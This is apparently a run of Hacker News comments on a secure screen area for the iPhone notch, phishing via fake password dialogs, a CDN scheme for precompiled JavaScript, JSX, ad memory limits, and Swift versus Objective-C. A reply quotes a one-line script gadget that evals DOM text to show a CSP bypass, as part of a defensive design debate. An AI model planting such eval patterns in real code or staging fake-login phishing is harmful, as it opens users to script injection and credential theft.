When the iPhone X notch was first announced I thought it would be a fantastic security UI opportunity: What if the top of the screen was only writable by the system? It would normally be black or show the time, but whenever there is a password dialog, it turns green with a security lock. This is something I've wanted on all computers for a while: fundamentally, any computer where you can get access to the whole screen's buffer means you can fake a logged out screen asking you to log in, or any other number of phishing attacks. The only way to prevent this is to have a separate secure screen buffer for a special part of the screen that the user can use to visually verify the security of an operation. The notch provided an awesome opportunity for the because: 1) it was NEW screen real estate, it wouldn't feel like you were acquiescing existing screen space for this security need and 2) it looks absolutely horrible when integrated into apps anyways, so why not use it minimally for good reason instead?
This already exists on Windows (via require Ctrl-Alt-Del) and to a lesser degree on Android (by always being able to show the action bar in fullscreen).
> This is something I've wanted on all computers for a while: fundamentally, any computer where you can get access to the whole screen's buffer means you can fake a logged out screen asking you to log in, or any other number of phishing attacks.
In Windows, I can render the whole screen, so I can put up a fake login dialog. To some extent, Windows users are used to requiring a ctrl-alt-delete before being prompted for a password, but there's no reason why I can't put up a static image of what the screen looks like during a password request. Having a portion of the screen which an application is forbidden from accessing would solve this, but the requirement for full-screen applications that want to write every user-visible pixel means that there's fundamentally no way to prevent this attack.
Ctrl-Alt-Delete on windows is a privileged hotkey that goes directly to the kernel. A phishing program can't intercept it once it has been pressed. If you know that Ctrl-Alt-Delete has been pressed, you are already privileged as the kernel and would be able to compromise a hypothetical protected screen buffer anyways.
The Windows login screen here doesn't allow you to type in the password until you press the magical keys that only the kernel can access. This significantly increases security, since any phishing program that puts up a fake static image doesn't know when to present the login dialog.
Programs can detect Ctrl alt del somehow, because RDP clients do it. But they can't intercept it.
But a phishing program can just show the enter password screen, without the ctrl alt del prompt. Few users understand the security need to press ctrl alt del. And in newer Windows, it doesn't seem to prompt unless you enable it via GP.
There are two vectors here; the one that the post was talking about is the fact that as long as an application controls the screen, they can show whatever they want -- for example, an app (or a full-screen web site) could render a pixel-perfect version of this:
And the user would say "oh, another stupid UAC prompt", enter their password, and that would be that -- UAC doesn't stop and say "press ctrl-alt-delete to enter your password". If it did, then that would significantly decrease the risk here.
They can detect it, VMWARE for example detects it as well and tells you that you should use ctrl+alt+insert.
Applications cannot fake ctrl+alt+del.
That said you can integrate with the windows login and extend it to show w/e you want I've written a client for a smart card for GINA a long long time ago.
Not initially, but just as users can be 'trained' to automatically enter in their password when they see a popup, they can eventually be trained to expect a new UI element to indicate it's secure.
Seems like in browsers, the lock icon and (for EV certs) company name in the location bar has been a plus, so there's certainly precedent for this sort of thing.
Yes indeed. I'm always a little anxious when an installer (or something) prompts me for an administrator password, and some secure channel indicating that it's really the OS that's asking for it would help to assuage my fears.
What does prevent the developer from making this new screen buffer blank/black and making the top of app's screen look exactly like that shape and style? The user won't see the difference except small top margin.
Am I missing something here? Isn't the notch already taken up by FaceID sensors/front-facing camera? It isn't really "extra screen real estate".
I do like the idea of a separate indicator for system-wide security events though. Perhaps an LED indicator although that doesn't seem very Apple-like.
I worked in dumb phone standards 12 years ago (GlobalPlatform) and it was actually in the standards to tell the user "you are in the secure zone". Well, OEMS in the western world were not really willing to implement it, funny it comes back now.
What are you embedding v8 into exactly? What happens if I figure out a buffer overflow in v8? What do I break out into? Is it solely process isolation? Is it in a container? A VM?
> What happens if I figure out a buffer overflow in v8?
You report it to Google for $15,000. ;)
More seriously, though, this is something we've spent a huge amount of effort worrying about. There are many layers of sandboxing and mitigation, including an incredibly tight seccomp filter, namespaces, cgroups, ASLR, architectural changes to keep sensitive secrets away from risky processes, etc. But we still worry and will continue to add more safeguards.
One of my main concerns with this proposal, is the increasing complexity of what was once a very accessible web platform. You have this ever increasing tooling knowledge you need to develop, and with something like this it would certainly increase as "fast JS" would require you to know what a compiler is. Sure, a good counterpoint is that it may be incremental knowledge you can pick up, but I still think a no-work make everything faster solution would be better.
I believe there exists such a no-work alternative to the first-run problem, which I attempted to explain on Twitter, but its not really the greatest platform to do so, so I'll attempt to do so again here. Basically, given a script tag:
A browser, such as Chrome, would kick off two requests, one to abc.com/script.js, and another to cdn.chrome.com/sha256-123/abc.com/script.js. The second request is for a pre-compiled and cached version of the script (the binary ast). If it doesn't exist yet, the cdn itself will download it, compile it, and cache it. For everyone except the first person to ever load this script, the second request returns before the time it takes for the first to finish + parse. Basically, the FIRST person to ever see this script online, takes the hit for everyone, since it alerts the "compile server" of its existence, afterwards its cached forever and fast for every other visitor on the web (that uses chrome). (I have later expanded on this to have interesting security additions as well -- there's a way this can be done such that the browser does the first compile and saves an encrypted version on the chrome cdn, such that google never sees the initial script and only people with access to the initial script can decrypt it). To clarify, this solution addresses the exact same concerns as the binary AST issue. The pros to this approach in my opinion are:
1. No extra work on the side of the developer. All the benefits described in the above article are just free without any new tooling.
2. It might actually be FASTER than the above example, since cdn.chrome.com may be way faster than wherever the user is hosting their binary AST.
3. The cdn can initially use the same sort of binary AST as the "compile result", but this gives the browser flexibility to do a full compile to JIT code instead, allowing different browsers to test different levels of compiles to cache globally.
4. This would be an excellent way to generate lots of data before deciding to create another public facing technology people have to learn - real world results have proven to be hard to predict in JS performance.
5. Much less complex to do things like dynamically assembling scripts (like for dynamic loading of SPA pages) - since the user doesn't also have to put a binary ast compiler in their pipeline: you get binary-ification for free.
The main con is that it makes browser development even harder to break into, since if this is done right it would be a large competitive advantage and requires a browser vendor to now host a cdn essentially. I don't think this is that big a deal given how hard it already is to get a new browser out there, and the advantages from getting browsers to compete on compile targets makes up for it in my opinion.
I don't think the binary AST proposal changes the accessibility status quo. In my mind, the best analogy is to gzip, Brotli, etc.
If you had to have a complicated toolchain to produce gzipped output to get the performance boost, that would create a performance gap between beginners and more experienced developers.
But today, almost every CDN worth its salt will automatically gzip your content because it's a stateless, static transformation that can be done on-demand and is easily cached. I don't see how going from JavaScript -> binary AST is any different.
I actually think gzip serves as a good example of this issue: this comment alone is daunting to a beginner programmer and it really shouldn't. This chrome/cdn thing could ALSO be auto-gzipping for you so that a beginner throwing files on a random server wouldn't need to know whether it supports gzip or not. I think we really take for granted the amount of stuff completely unrelated to programming we've now had to learn. If our goal is to make the web fast by default, I think we should aim for solutions that work by default.
It's definitely the case that once a technology (such as gzip) gets popular enough it can get to "by default"-feeling status: express can auto-gzip, you can imagine express auto-binary-ast-ing. It's slightly more complicated because you still need to rely on convention of where the binary-ast lives if you want to get around the dual script tag issue for older browsers that don't support binary ast yet (or I suppose have a header that specifies it support binary ast results for js files?). Similarly, at some point CDN's may also do this for you, but this assumes you know what a CDN is and can afford one. The goal I'm after is it would be nice to have improvements that work by default on day 1, not after they've disseminated enough. Additionally, I think its really dangerous to create performance-targeted standards this high in the stack (gzip pretty much makes everything faster, binary ast one kind of file, and introduces a "third" script target of the browser). The chrome/cdn solution means that firefox/cdn might try caching at a different level of compilation, meaning we get actual real world comparisons for a year before settling on a standard (if necessary at all).
Edit: another thing to take into account, is that it now becomes very difficult to add new syntax features to JavaScript, if its no longer just the browser that needs to support it, but also the version of the Binary AST compiler than your CDN is using.
The process of getting content on to the web has historically been pretty daunting, and is IMO much easier now than the bad old days when a .com domain cost $99/year and hosting files involved figuring out how to use an FTP client.
In comparison, services like Now from Zeit, Netlify, Surge, heck, even RunKit, make this stuff so much easier in comparison now. As long as the performance optimizations are something that can happen automatically with tools like these, and are reasonable to use yourself even if you want to configure your own server, I think that's a net win.
I do agree with you though that we ought to fight tooth and nail to keep the web as approachable a platform for new developers as it was when we were new to it.
On balance, I'm more comfortable with services abstracting this stuff, since new developers are likely to use those services anyway. That's particularly true if the alternative is giving Google even more centralized power, and worse, access to more information that proxying all of those AST files would allow them to snoop on.
This suggestion has a problem similar to the reason that browsers don't globally cache scripts based on integrity values: with your suggestion, if a domain temporarily hosts a .js file with a CSP-bypass vulnerability (ie. `eval(document.querySelector('.inline-javascript').textContent)` is a simple example; many popular javascript frameworks exist that do the equivalent of this), and then later removes it and starts using CSP, an attacker who knows an XSS vulnerability (which would otherwise be useless because of CSP) could inject a script tag with the integrity set equal to the CSP-vulnerable script that used to be hosted at the domain, and Chrome would find the script at the cdn.chrome.com cache.
(You might be thinking someone could set CSP to disable eval on their pages, but eval is reasonably safe even in the presence of otherwise-CSP-protected XSS attacks as long as you aren't using code that goes out of its way to eval things from the DOM, and it's more than annoying that the only way to protect yourself from this cache issue would be to disable eval. ... Also, there are some libraries that interpret script commands from the DOM without using eval, so disabling eval doesn't even protect you if you previously hosted one of those javascript files.)
You could have the cdn.chrome.com cache aggressively drop the cache of things greater than a certain amount of time like a day. But then there's a question of whether the requests to the cache are all just wasted bandwidth for the many requests by users to scripts that hadn't been loaded in a day. And the whole system means that website security can be dependent on cdn.chrome.com in some cases. I'd rather just build and host the processed binary AST myself. I already use a minifier; for most people, the binary AST tool would just replace their minifier.
Interesting idea, which could be built on top of the Binary AST.
I would personally prefer it being handled transparently by the middleware or the cdn, which would neatly separate the responsibilities between the browser, the cache+compressor and the http server.
Anyway, one of the reasons this project is only about a file format is so that we can have this kind of conversation about what the browsers and other tools can do once we have with a compressed JS file.
One of my fears about doing this at the CDN level is that now introducing a new syntax feature means you need the browser to support it AND the version of the Binary AST compiler on your CDN. Imagine using a new JS keyword and all of a sudden all your code gets slower because its a syntax error at the CDN level. It would just slower the rate of introduction of new syntax features I think by needing a lot more coordination: its already a bit messy with different browsers having different support, now caniuse.com may need to include CDN's too.
One of the nice things about the way we do things with RunKit embeds (https://runkit.com/docs/embed) is that the code lives in your site, not on ours. The API generates the embed the same way something like highlight.js generates syntax-colored code on your site. That means if we're ever down, your site gracefully degrades to a not-runnable snippet, as opposed to merely disappearing like this seems to or with embedded gists.
I've written an in depth blog post on "generic jsx", which turns JSX into function bind/currying syntax that would work fine in any framework (or not framework at all, as we currently use it).
That would be actually super useful. JSX became for me the best part after writing React applications for quite a while. Performance-wise not using React is actually faster ^^ (If you take care of the dirty updating work of course)
6 years ago I wrote a proof of concept to replace a large Rails application in pure JS using prototypes and constructing the html from strings. The latter turned out to be the most messy part so I stopped that and rather refactored the legacy Rails code to do something useful.
Could be really great for super lightweight JS apps!
Its also important to consider the environment as well since JSX is potentially much bigger than the web.
JSX is much like other generic user interface markup languages[0] and like many other is simply a dialect of XML. Any interface that can be represented with XML/HTML or any other markup language can use JSX and optionally react. We are already seeing this boom with in native mobile environments with React Native, NativeScript, Titanium...
Here are several examples where JSX is used that is not a browser:
- Native desktop apps for Linux, Mac, and Windows (Not including Electron/NW.js)[1][2][3][4]
- TVs with AppleTV apps or Netflix's Gibbon[5][6]
- Command line apps as stdin/stdout with react-blessed[7]/mylittledom[8]
- Direct to Canvas[9]/pixi.js[10]
- Latex documents[11]
- Web Audio[12]
- Conole.logs[13]
- Truly custom direct to hardware[14] as some C code like: `digitalWrite(led, HIGH)`
I definitely believe JSX could use standardization separate from any implementation, JavaScript or otherwise.
I think a good approach would be to have web browsers limit the amount of memory ads can use on a given page.
This would hopefully align incentives: we understand that ads are necessary for the web, but ad makers have to work on efficiency to increase revenue. This would theoretically be like "AMP for ads". If you use too much memory, your ads drop because you keep crashing on the page (just the ad of course).
If you wanted to be perverse, you could have a limit on TOTAL memory all ads could use on a page, so you end up creating group pressure on any individual that's not playing nice (they might start demanding not to be served on the same page as those ads etc). But maybe this is too much. Just limiting the total amount of "memory usage" is a good start.
The important thing here is that it hopefully leads to the world we actually want: REASONABLE ads that don't require crazy measures that end up hurting the sites we love. Browsers COULD ship this by default without hurting the ecosystem.
Mozilla is looking to use Firefox's Tracking Protection list to lower the priority of ads' HTTP requests and more aggressively throttle them when they are not visible. But setting a fixed ad budget per page, as you suggest, or maybe forcing all ads from all tabs to share one process could be interesting.
have web browsers limit the amount of memory ads can use on a given page
That's easily done by installing an adblocker! Can't beat memory limit = 0.
we understand that ads are necessary for the web
Well, hold on now. The web existed before ads did, and it was pretty cool. If ads disappeared, we'd still have a web - lots of its most annoying parts would disappear, and we'd have a lot of readjusting to do, but what we'd end up with would keep all the best parts of what we have now, because the best parts of the web aren't based on ads.
First off, this is very well written. Secondly, I'd like to state that I think that Objective-C and Cocoa were really good. I disagree with most of the design paradigms today, but I think the Objective-C/Cocoa ecosystem represented something approaching a local maxima in the mutable programming space. Maybe not even a maxima, as I was actually really happy with the direction it was going pre-Swift (KVO was starting to get good in NSTreeNode, the language additions were welcome, etc.)
All this to say: I think the Swift transition was really misguided, and I was incredibly surprised that that wasn't the general take at the time. Everything about it seemed not well-planned out: the fact that no one at Apple had heard of it (you have the world's best ObjC programmers in-house and don't bother to get internal buy-in first!), the fact that it was really a response to C++ not Objective-C (this is so clear when listening to Lattner, who incidentally, did most his programming in C++ it seems), the fact that they sold it as good for everything from scripting to systems programming (huge red flag), and on and on.
But the real concern here was the opportunity cost. What was the problem they were trying to solve with Swift? That square brackets were off-putting? That a group that until that point were totally bought into dynamic dispatch should switch gears completely to a strict typed language? If you ask me, the only goal that should have mattered was making development easier and expanding the scope of people that could approach the platform. And, for the record, I am sure they believe they attacked this problem, I clearly disagree however.
I think the real areas ripe for improvement were the tools. Look no further than Facebook, with React Native and the no-recompile workflows where you change the UI and see it instantly on your device. This would have been game changers in making development easier, not adding Maybes (and this is coming from someone who does immutable development now). Objective-C could have been evolved into the language they wanted. It would have probably taken just as long as however long this "transition" is going to take, and it would have given everyone immediate actionable benefits instead of being a binary switch that comes along with the pain of having to ship the runtime.
Instead, we have discussions about whether Foundation is going to be rewritten in Swift. This seems like such an incredible misprioritization. Essentially creating a situation for yourself where you have to burn everything down and start from scratch, all while in the meanwhile have the head-scratching platform where the base libraries are written in a dynamic language and user land code is a strict systems language.
The last thing I'll mention is the worrying lack of "purpose" for Swift. Talk to a Rust guy, and he WILL tell you the reason to use Rust. Talk to a Haskell person and they'll do the same. The sole reason for Swift seems to be "to take over the world". It is decidedly not a very opinionated language in that regard. In the ATP interview, Lattner even said that dynamic dispatch may be added later to Swift so no one should worry about it, it seems like such a kitchen sink. (I loved the bit where he said that if they add in multiline string literals they can probably "win" the scripting space). Not a lot of passion there.
> The last thing I'll mention is the worrying lack of "purpose" for Swift. Talk to a Haskell person and they'll do the same.
Really? Real type safety and no null pointer exceptions unless you really want it are not a purpose? A compact syntax that is still as descriptive as Objective-C's syntax?
My programs are much more stable in a lot of regards since I started using Swift.
I do not believe stability was the problem in iOS land (from my personal user perspective). The problems with iOS apps I experience most frequently come from a lack of handling asynchronous events and state management. I can frequently get programs into weird states due to clearly not handling edge cases in the way animations finish, or things loading before something else is ready, etc. I think attacking asynchronous flow management (the way countless other languages like JavaScript and Python and C# have with async/await for example) would have really demonstrated and understanding of the key space this language was going to be initially used for. Instead, async primitives are going to be missing for at least another version of the language, and programmers will remain using very primitive synchronous tools for managing increasingly complex asynchronous states demanded from ever more animation-heavy and internet-talking apps. I believe investing in asynchronous language additions for Objective-C would have lead to much more stability from a user perspective. And they aren't even mutually exclusive, Objective-C was already moving in the direction of more type safety and could have continued down that path.
Separately, I think people that have used languages like elm or Haskell would argue that Swift does not present a particularly strong example of "real type safety". Both from a language perspective (yes certainly stricter than some languages, but not as strong as others), but also from a culture perspective. Haskell/elm people I think have a true culture of correctness in code (and arguably Rust as well from the type-for-ownership-safety perspective), which Swift does not particularly share as far as I can tell. Don't get me wrong, it is in fact "stronger" than Objective-C, but I don't think its the slam dunk go-to language for mission critical software, or guaranteed to be safe software either mind you. Again, I think an indicator of this is the fact that the creator is convinced it could rock both systems programming AND scripting. I think most other languages, if asked the big "why?", would tell you THE raison d'être for its existence. Aside for "the standard language for iOS apps" default answer, I don't get a strong sense of that from Swift, if I did, I think there would be a lot of work in "Swift is for X, we don't want to be distracted by Y right now" (I think many people want to write server code in elm, but they staunchly want to NAIL UI programming, Rust wants to NAIL systems programming with safety, etc.) With Swift its always "oh once we add this feature, then it'll be perfect for that too".
> I do not believe stability was the problem in iOS land (from my personal user perspective)
This. (And the parent). Almost everything that's an improvement in Swift rated at best a "nice to have" in my experience with development pain points.
And what's really surprising is that, due to the flexibility of Objective-C, we actually had some fairly good ideas of where those pain points were: all the places runtime-dynamicism/metaprogramming was used to "extend" the language.
So address these points, and better yet, create better metasystems that allow users of the language to tackle these issues with less hackery.
Instead, pretty much crickets on all of these fronts, and at best grudging incorporation of minimal bridges to those same hacks. Wut?
Instead a "playground" for the compiler to show how incredibly smart it is.
I think compatibility with Objective-C and existing libraries is one of the main reasons things like fragile callbacks [weak self] strong self dance still exists in Swift.
I once got a different object returned than a Swift interface promised. That's definitely because of some kind of Objective-C library returning something completely else and still passing a compile.
I like Objective-C and would still use it when I would need to use a lot of C or C++ libraries. But the compile time guarantees are simply better and forcing me to write safer code or removing a ton of boiler plate checks altogether.
Although responding to this one cherry-picked snarky statement I made is probably a mistake as its almost certainly clear from, for example, another difference I list in the immediately following sentence, I will bite and state that you probably underestimate the "Objective-C is weird" complex it suffered throughout its entire lifetime, and that that almost certainly contributed to considering writing/approving an entirely new language. Additionally, the reason to call out the square brackets is that many of the other Swift differences could have been integrated into an evolved Objective-C.
That sounds backwards to me. Syntax is fairly trivial, and adding a new syntax for message sends in Objective-C would have been easy. They already did this a bit by adding dot-syntax for accessing properties. Adding other major Swift features to ObjC, like pervasive type inference, generics, and capable value types would be much harder without effectively turning it into a new language.
(And yes, I know ObjC got generics recently, but it's not remotely the same as what Swift has.)
Logically, yes. Well, only sort of, but that's a different topic.
However, emotionally it seems to be of the upmost importance, and developers are just as human as the rest of the world, we just manage to rationalize our prejudices better than most.
I've talked to many, many developers as to why they like/enjoy/prefer Swift. A lot of the reasons that are given turn out to be, well, let's just say "less than substantive". And after a bit of digging it pretty much boils down to the "familiar" syntax.
That always baffled me. I feel like an experienced developer should be like Cypher in The Matrix. "I don't even see the code. All I see is blonde, brunette, redhead." But I do realize that it's how some people work, even if I don't get it.
In any case, I was talking about the difficulty of making changes to a compiler, not how programmers react to it.
> a mistake as its almost certainly clear from, for example, another difference I list in the immediately following sentence...
I didn't reply to that sentence because I didn't want to have to point out your understanding of Objective-C was incorrect, it is not weakly typed, only some Foundation objects are weakly typed.
As the other comment here mentions, syntax is trivial (although being informed by 20 years of language design is not so trivial to me day to day), the key differences in overall safety, expressiveness and features in the language is far bigger than trivial method syntax.
Uh oh, about to get into an argument over terms that have no precise definition, but I believe that in the context of Objective-C vs. Swift, Objective-C is perfectly fair to be considered weakly typed. In fact I think that in the context of Objective-C vs. most other typed languages it is perfectly fair to consider Objective-C weakly typed, especially when the dominant culture involved using id everywhere and since generics were only added very late in the language so your base collection classes were all weakly typed for 99% of the life of the language. I'd find it really eyebrow-raising for someone to not consider Objective-C "more weakly typed" than Swift, or do you think that Swift did not introduce a culture of stronger typing?
But I digress: regardless of whether syntax is trivial or not, my point is that I believe wanting to have a clear break from a syntactic perspective with a language that was plagued as being "different looking" for its entire life was probably a goal in the creation of a new language. Do you really not remember pre-Swift where "Objective-C is weird looking" was an actual argument people would make? Objective-C could have been made more safe, it could not however have its syntax drastically altered without considering it a new language.
Also, for the record, before Apple got serious about protocols, AppKit and WebKit were full of respondsToSelector: mumbo-jumbo, so you're just wrong about Objective-C not being weakly typed. If I can type it weakly, then it is weakly typed. And by can I mean can effectively, that is to say, thanks to Objective-C's reflection you can both use id and still interact with it, vs creating an AnyObject type class in a stricter strongly typed language where the compiler will not let you then just call whatever method you want on it. In fact, remnants of this clearly remain in WebKit where you have protocols where every method is optional, and thus everything is respondsToSelector: protected, making a "strongly typed" description highly suspect.
> your understanding of Objective-C was incorrect, it is not weakly typed,
That's an, er, interesting statement.
Objective-C is probably about as weakly typed as it is possible to get and still have the ability to write type annotations. From a static typing perspective, it combines the strongly dynamically typed world of Smalltalk with the weakly statically typed world of C, and with the strong possibility of C-style consequences (kaboom) if you get it wrong.
First of all, the ability to statically type Objective-C objects was added to the language after-the-fact (NeXTStep 2.x or 3.x?), and those types have been and continue to be largely cosmetic (with one crucial exception). So if I have "NSNumber *a" and the actual object is an NSString, the runtime will select the NSString methods, not the NSNumber methods.
Subverting the "type checking" is about as easy as can be: (a) assign from/to "id" (b) pipe through a collection (now we have pseudo-generics) (c) cast (d) declare methods on a protocol that you never implement anywhere (or that has been implemented somewhere else).
The crucial exception is that if you have, roughly speaking, C types (particularly ones that aren't equivalent to an 'id' in machine-representation) in your message signature, you will crash if you signatures are incompatible because you got the wrong one.
Which is why I advocate for the safe "id subset"[1].
I think that would be the eventual goal, Objective-C minus C. Objective-C in a lot of ways was a vehicle for AppKit/UIKit, and that experience does not necessitate the C compatibility in my opinion. Don't get me wrong, the C compatibility is nice and allows some cool features when you need them, but I think it was more useful back in the day when performance was more of a concern, and a good FFI layer would be sufficient now.
> I think that would be the eventual goal, Objective-C minus C.
I still think that if your goal was this gradually typed language on top of a dynamic runtime, it would make more sense to start anew and model your language after, say, StrongTalk or (the good parts of) JavaScript/TypeScript, rather than trying to evolve the existing Objective-C language and Clang implementation.
I guess I mostly take issue with your characterization of Swift as C++ derived, or consisting of a collection of random features. The designers avoided a lot of the brokenness of C++, such as header files, copy constructors, compile-time instantiation of (what are essentially untyped) templates, etc, and when compared with Objective-C together with the C parts, the language seems mostly well-thought out and orthogonal, even if my personal preference would have been to start with less syntax sugar.
I think a better assessment is that Swift is sort of an Ocaml with more C-like syntax, together with some design decisions meant to ease interoperability with Objective-C, such as the choice to go with ARC over GC.
So this brings me to what I really wanted to say, which is that I feel like a gross simplification of your overall argument is that "I wanted Strongtalk, and they gave us Ocaml". I understand and respect that point of view, and don't really have a concise rebuttal to offer; it mostly comes down to personal preference. Perhaps if things had turned out the other way, we would instead be hearing a lot of feedback along the lines of, "Why is Apple ignoring the last 20 years of type system research", etc.
Another thing that's mostly lost in these discussions is that people lump a ton of mostly independent features under the banner of "dynamic dispatch". In a formal sense Swift has dynamic dispatch, in that you can write a function that call methods on a protocol, passing in different concrete types at runtime. That certainly qualifies in my opinion. I think what is really meant here is the following three capabilities:
1) Write reflection. Right now, Swift actually emits more metadata than Objective-C, in the sense that all values can be reflectively inspected, whereas the Objective-C runtime only knows about classes, and not anything else. For example you can print() any value in Swift and get a sort-of homoiconic representation back, showing the enum case and associated value, or the fields of a struct or tuple, etc. This is implemented with a 'Mirror' type in the standard library which reads this metadata produced by the compiler and presents it as a keyed collection that can be subscripted, iterated over, etc. What's missing here is presenting it as a mutable dictionary, and this can be added without introducing much complexity in the language.
2) Forming dynamic calls and introspecting the methods of a class, or the functions in a module. This is a bit more difficult to design and implement, but I think it can be introduced in a clean way that's sane to use. It's really quite a shame that Java has set the bar so low for such capabilities in a statically-typed language; while all the actual features are there (and you can even synthesize bytecode at runtime), it's incredibly awkward to use, which means developers constantly re-invent frameworks on top of these mechanisms over and over again, but they seem to only obscure the basic ideas further with a soup of FactoryFactories and XML files.
3) Proxy objects dynamically conforming to protocols. Again, this can be statically-typed; starting with a set of closures that implement the requirements of a protocol, the runtime could cook up the right structures to make it appear like an "ad-hoc" instance of the protocol that's not backed by a named concrete type. With the right API this could be quite pleasant and concise.
I believe all of these could be added in a clean way that's easy to use, mostly as library features without introducing new syntax or semantics. Their current absence should not be seen as an inherent limitation.
Finally, I agree with your point that interactive development is important and should be more of a focus in general. I think it's a shame that since the early 90s or so, programming language research has centered on designing (mostly statically-typed) languages with batch compilers, and not complete "environments" like Smalltalk-80, Self, Lisp machines, etc. It would be good to see more projects explore the latter, and the basic ideas should apply to both static and dynamically typed languages.
I like what you're doing with RunKit, by the way -- best of luck there.
Pithy, and there's some truth to that, but I would point out that (a) StrongTalk is now well over 20 years old (b) it has a sophisticated type-system that could certainly have been developed further and (c) it requires a JIT for performance.
But "Objective-C without the C" does point very strongly in the direction of Smalltalk, and a Smalltalk language that can be AOT compiled roughly as efficiently as Objective-C and is at least as compatible with C/Objective-C seems like not too much of a challenge.
After all, Objective-C now has tagged pointer objects, so a lot of the need for primitive objects has gone away. So let all literals/variables be objects by default and the syntactic overhead due to duplication goes away ( 1, @1, "string, @"nsstring" ).
What if we want "C" level primitives? Just type them:
Pointers are tricker and should, IMHO, be generalized to 1st class references that subsume things like KVC/KVO/bindings, file references, URIs etc. (see http://objective.st/URIs ).
So the point is not 'Objective-C forever', but rather: let's actually learn from what was good and bad about Objective-C and base our language design on that, rather than coming completely from left field and then only putting in compatibility kludges.
Then you wouldn't have the situation that we have now where people are clamoring for "pure Swift" versions of...well pretty much everything, and those things are, if "pure Swift" going to incompatible with what is there now. And more importantly, not build on the knowledge/learnings of what is arguably the best UI framework ever built.
Yeah. Nothing has really come close to offering the same experience as HyperCard in my opinion. The key feature that no subsequent environment has really been able to copy is that there's no distinction between "running" and "editing" your program; while the UI is modal, this is mostly a convenience to avoid clutter, and fundamentally, your stack is always "running", whether you're authoring, editing data or just browsing.
I've responded to this lower: https://news.ycombinator.com/item?id=13545862 , but this is not how this feature works. The confusion is completely understandable if you've never used RunKit, but the idea is not to give people containers, but rather a "common ground" where users can provide reproducible test cases.